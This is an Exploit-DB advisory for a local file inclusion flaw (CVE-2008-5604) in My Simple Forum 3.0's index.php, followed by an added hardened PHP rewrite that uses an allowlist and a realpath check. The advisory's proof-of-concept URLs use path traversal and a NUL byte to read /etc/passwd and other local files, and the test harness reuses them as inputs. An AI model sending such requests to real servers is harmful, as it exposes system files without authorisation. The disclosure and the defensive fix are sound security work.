- 18 Dec 2022
- EDB-ID: 7342
- EDB verification: Passed
- Author: CONDEMNED
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2008-5604
- Publication date: 2008-12-04
Code:
/*
$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $
My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
Bug discovered by cOndemned
Script download: http://drennansoft.com/index.php?action=download&id=1
Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura
*/
Source of index.php:
49. if(file_exists('site/'.$_GET['action'].'.php')) {
50. include('site/'.$_GET['action'].'.php');
51. } else {
local file inclusion on line 50
Proof of concept:
http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
# milw0rm.com [2008-12-04]
- Source: www.exploit-db.com
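
A hardened form of the `include` on lines 49-50 of index.php quoted above, as an added example that is not part of the original advisory or of My Simple Forum's code. It assumes the page scripts live in `site/` beside the script; the action names in the allowlist and the `resolve_action` helper are hypothetical.

```php
<?php
// Added example, not My Simple Forum's own code.
// Assumptions: page scripts live in site/ beside this file, and the
// action names in ALLOWED_ACTIONS are hypothetical placeholders.
const PAGE_DIR = __DIR__ . '/site';
const ALLOWED_ACTIONS = ['home', 'forum', 'topic', 'profile'];

/** Map a request's "action" value to a file inside PAGE_DIR, or null. */
function resolve_action($action, string $pageDir = PAGE_DIR): ?string
{
    // Reject arrays (?action[]=x) and anything not on the allowlist.
    // "../" sequences and a trailing NUL byte never match an entry.
    if (!is_string($action) || !in_array($action, ALLOWED_ACTIONS, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the result is still
    // under the page directory (catches symlinks and later list mistakes).
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . $action . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: one allowlisted action plus the PoC shapes above.
    // 'forum' prints a path only if site/forum.php actually exists.
    $samples = ['forum', "../../../../../../../etc/passwd\0", '../../../../x', ['forum']];
    foreach ($samples as $s) {
        printf("%-45s => %s\n", json_encode($s), resolve_action($s) ?? 'rejected');
    }
    exit;
}

// Web request path: include only a resolved, allowlisted page.
$page = resolve_action($_GET['action'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown action');
}
include $page;
```

Because the request value is only compared against fixed names and never concatenated into a path unless it matches one, the check does not depend on how the PHP version in use treats NUL bytes in file names.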